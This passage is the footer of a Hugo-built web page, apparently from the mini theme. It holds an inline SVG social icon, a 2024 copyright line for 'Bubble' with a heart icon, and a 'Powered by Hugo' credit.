        <svg fill="#bbbbbb" width="28" height="28" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="438.536px" height="438.536px" viewBox="0 0 438.536 438.536" style="enable-background:new 0 0 438.536 438.536;"
	 xml:space="preserve">
<g>
	<path d="M414.41,24.123C398.333,8.042,378.963,0,356.315,0H82.228C59.58,0,40.21,8.042,24.126,24.123
		C8.045,40.207,0.003,59.576,0.003,82.225v274.084c0,22.647,8.042,42.018,24.123,58.102c16.084,16.084,35.454,24.126,58.102,24.126
		h274.084c22.648,0,42.018-8.042,58.095-24.126c16.084-16.084,24.126-35.454,24.126-58.102V82.225
		C438.532,59.576,430.49,40.204,414.41,24.123z M335.471,168.735c0.191,1.713,0.288,4.278,0.288,7.71
		c0,15.989-2.334,32.025-6.995,48.104c-4.661,16.087-11.8,31.504-21.416,46.254c-9.606,14.749-21.074,27.791-34.396,39.115
		c-13.325,11.32-29.311,20.365-47.968,27.117c-18.648,6.762-38.637,10.143-59.953,10.143c-33.116,0-63.76-8.952-91.931-26.836
		c4.568,0.568,9.329,0.855,14.275,0.855c27.6,0,52.439-8.565,74.519-25.7c-12.941-0.185-24.506-4.179-34.688-11.991
		c-10.185-7.803-17.273-17.699-21.271-29.691c4.947,0.76,8.658,1.137,11.132,1.137c4.187,0,9.042-0.76,14.56-2.279
		c-13.894-2.669-25.598-9.562-35.115-20.697c-9.519-11.136-14.277-23.84-14.277-38.114v-0.571
		c10.085,4.755,19.602,7.229,28.549,7.422c-17.321-11.613-25.981-28.265-25.981-49.963c0-10.66,2.758-20.747,8.278-30.264
		c15.035,18.464,33.311,33.213,54.816,44.252c21.507,11.038,44.54,17.227,69.092,18.558c-0.95-3.616-1.427-8.186-1.427-13.704
		c0-16.562,5.853-30.692,17.56-42.399c11.703-11.706,25.837-17.561,42.394-17.561c17.515,0,32.079,6.283,43.688,18.846
		c13.134-2.474,25.892-7.33,38.26-14.56c-4.757,14.652-13.613,25.788-26.55,33.402c12.368-1.716,23.88-4.95,34.537-9.708
		C357.458,149.793,347.462,160.166,335.471,168.735z"/>
</g>
</svg>

    </a>


</div>

    

    <div class="copyright">
    
       © Copyright 
       2024 
       <span class="split">
        <svg fill="#bbbbbb" width="15" height="15" version="1.1" id="heart-15" xmlns="http://www.w3.org/2000/svg" width="15px" height="15px" viewBox="0 0 15 15">
  <path d="M13.91,6.75c-1.17,2.25-4.3,5.31-6.07,6.94c-0.1903,0.1718-0.4797,0.1718-0.67,0C5.39,12.06,2.26,9,1.09,6.75&#xA;&#x9;C-1.48,1.8,5-1.5,7.5,3.45C10-1.5,16.48,1.8,13.91,6.75z"/>
</svg>
       </span>
       Bubble
    
    </div>

    
      <div class="powerby">
        Powered by <a href='http://www.gohugo.io/'>Hugo</a> Theme By <a href='https://github.com/nodejh/hugo-theme-mini'>nodejh</a>
      </div>
    
</footer>



  </body>
</html>
